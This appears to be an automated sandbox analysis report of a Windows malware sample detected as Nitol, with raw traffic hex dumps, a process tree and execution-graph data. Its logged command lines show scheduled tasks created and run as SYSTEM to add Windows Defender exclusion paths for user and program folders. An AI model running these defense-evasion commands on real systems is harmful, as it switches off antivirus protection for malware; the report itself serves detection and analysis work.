2025-01-06 03:51:45 UTC	4096	IN	Data Raw: 61 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d Data Ascii: a``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
2025-01-06 03:51:45 UTC	4096	IN	Data Raw: 60 ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3 Data Ascii: `5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
2025-01-06 03:51:45 UTC	4096	IN	Data Raw: 62 e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60 Data Ascii: bjebp````]bp`At``_l+-D^__H\|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`
2025-01-06 03:51:45 UTC	4096	IN	Data Raw: eb 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70 Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka\|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp

Target ID:	0
Start time:	22:49:54
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\2749837485743-7684385786.05.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\2749837485743-7684385786.05.exe"
Imagebase:	0x140000000
File size:	30'885'376 bytes
MD5 hash:	5B695FABFCD1DA54F7C193EF5F11EF6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:50:53
Start date:	05/01/2025
Path:	C:\Users\user\Documents\7tqorj.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\7tqorj.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	22:50:54
Start date:	05/01/2025
Path:	C:\Users\user\Documents\7tqorj.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\7tqorj.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:51:01
Start date:	05/01/2025
Path:	C:\Users\user\Documents\7tqorj.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\7tqorj.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	22:51:12
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff690400000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	22:51:12
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	22:51:12
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff602720000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	22:51:12
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff602720000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:51:12
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff690400000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	22:51:12
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff602720000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:51:13
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	22:51:13
Start date:	05/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7641c0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:51:13
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff690400000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:51:13
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:51:13
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff602720000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:51:13
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff602720000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	22:51:13
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff690400000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	22:51:13
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:51:13
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff602720000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	22:51:13
Start date:	05/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7641c0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	22:51:14
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff690400000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	22:51:14
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	22:51:14
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff602720000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	22:51:14
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff602720000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	22:51:14
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff690400000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	22:51:14
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff602720000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	22:51:15
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	22:51:15
Start date:	05/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7641c0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	22:51:15
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff690400000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	22:51:15
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	22:51:15
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff602720000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	22:51:15
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff602720000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	22:51:15
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff690400000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	22:51:15
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff602720000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	22:51:15
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	22:51:16
Start date:	05/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7641c0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	22:51:45
Start date:	05/01/2025
Path:	C:\Program Files (x86)\qNHTRl\qNHTRl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\qNHTRl\qNHTRl.exe"
Imagebase:	0x810000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	22:51:47
Start date:	05/01/2025
Path:	C:\Program Files (x86)\qNHTRl\qNHTRl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\qNHTRl\qNHTRl.exe"
Imagebase:	0x810000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	22:51:48
Start date:	05/01/2025
Path:	C:\Program Files (x86)\2U36F\NroRNr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\2U36F\NroRNr.exe"
Imagebase:	0xfa0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	22:51:49
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c echo.>c:\xxxx.ini
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	22:51:49
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	22:52:01
Start date:	05/01/2025
Path:	C:\Program Files (x86)\2U36F\NroRNr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\2U36F\NroRNr.exe"
Imagebase:	0xfa0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	22:52:02
Start date:	05/01/2025
Path:	C:\Program Files (x86)\qNHTRl\qNHTRl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\qNHTRl\qNHTRl.exe"
Imagebase:	0x810000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32%
Total number of Nodes:	462
Total number of Limit Nodes:	10

Executed Functions

Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0000000140006D6C
@, xrefs: 0000000140006FA2

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
